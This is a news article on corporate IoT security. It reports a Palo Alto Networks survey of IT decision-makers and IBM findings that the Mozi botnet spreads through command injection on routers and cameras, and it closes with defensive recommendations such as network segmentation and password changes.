An odd range of internet-connected devices, including medical devices, kitchen appliances, coffee machines, sports equipment, and desk toys, are appearing on some corporate networks according to a recent survey of IT decision-makers.
The survey — sponsored by Palo Alto Networks — suggests IT leaders aren’t quite sure if they have a handle on every Internet-of-Things device in their environment.
Separately, IBM reports that a new botnet of infected IoT devices — mainly commercial routers — is accounting for an increased percentage of IoT-based botnet traffic. The report, released Thursday, says early 90 per cent of the observed IoT network traffic from October 2019 through June came from what it dubs the Mozi botnet.
IBM calls the leap a “startling takeover” of the percentage of traffic from such well-known IoT botnets as Mirai. It was accompanied by a huge increase in overall IoT botnet activity, which the report says suggests Mozi did not remove competitors from the market. Instead, it flooded it.
Depending on the definition, IBM estimates there are about 31 billion IoT devices deployed around the globe, and the IoT deployment rate is now 127 devices per second. IoT devices can including consumer (toys, cameras), commercial (everything from healthcare monitors to sensors the supply chains), enterprise (routers, projectors) and industrial (logic controllers in factories and pipelines) products.
IBM research suggests Mozi continues to be successful largely through the use of command injection (CMDi) attacks, which often result from the misconfiguration of IoT devices, the report says. Weak telnet passwords are a contributing factor. Using a “wget” shell command, threat actors alter permissions so they can interact with the affected system.
Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device. Mozi can conduct DDoS attacks (HTTP, TCP, UDP); carry out command execution attacks; download malicious payload from specified URLs and execute it, and gather bot information.
Among the devices IBM found vulnerable to Mozi are routers from Huawei, Netgear, and D-Link units using a software development kit from Realtek, GPON routers for optical networks used by carriers and — as usual — internet-connected TV cameras and digital recorders.
“Command injection remains the primary infection vector of choice for threat actors, reiterating how important it is to change default device settings and use effective penetration testing to find and fix gaps in the armour,” says the IBM report.
As many as 95 per cent of respondents to the Palo Alto survey said they have visibility of all the IoT devices on their networks. Yet 41 per cent of respondents agreed they need to make a lot of improvements to the way they approach IoT security. Another 17 per cent felt a complete overhaul is needed.
The survey polled 1,350 IT business decision-makers at organizations with at least 1,000 employees in 14 countries across Asia, Europe, the Middle East and North America.
The report’s authors argue “IoT is the soft underbelly of many businesses and an area they need to do more to protect.”
Only one in five (21 per cent) of those surveyed said their organizations have segmented their networks to contain IoT devices in their own tightly controlled security zones.
“Devices that employees innocently bring onto an organization’s network are often not built with security in mind, and can be easy gateways to a company’s most important information and systems,” May Wang, senior distinguished engineer at Palo Alto Networks said in a statement. “To address that threat, security teams need to be able to spot new devices, assess their risk, determine their normal behaviours and quickly apply security policies.”
The company recommends IT departments
- Employ device discovery for complete visibility. The first thing businesses need to do is get visibility into the exact number and types of devices on their networks, keeping a detailed, up-to-date inventory of all connected IoT assets, their risk profiles, and their trusted behaviours;
- Apply network segmentation for stronger defence. Businesses should divide their networks into subsections to enable granular control over lateral movement of traffic between devices and workloads, reducing the attack surface. Virtual local area network (VLAN) configurations and next-generation firewall policies should be used to keep IoT assets and IT assets separate;
- Adopt secure password practices. Strong password security is fundamental to securing IoT devices. As soon as an IoT device is connected to the network, the IT team should change the weak default password with a secure one that aligns with the organization’s password policies;
- Continue to patch and update firmware when available. Most IoT devices are not designed to patch security flaws regularly, so it is critical that IT teams ensure devices are regularly patched for known vulnerabilities. To avoid data loss, add dedicated IoT-aware file and web threat prevention as well as virtual patching capabilities via intrusion prevention.
- Actively monitor IoT devices at all times. Traditional endpoint security solutions require software agents that IoT devices are not designed to take. Organizations should implement real-time monitoring to continuously analyze the behaviour of all network-connected IoT endpoints by integrating existing security postures with their next-generation firewall.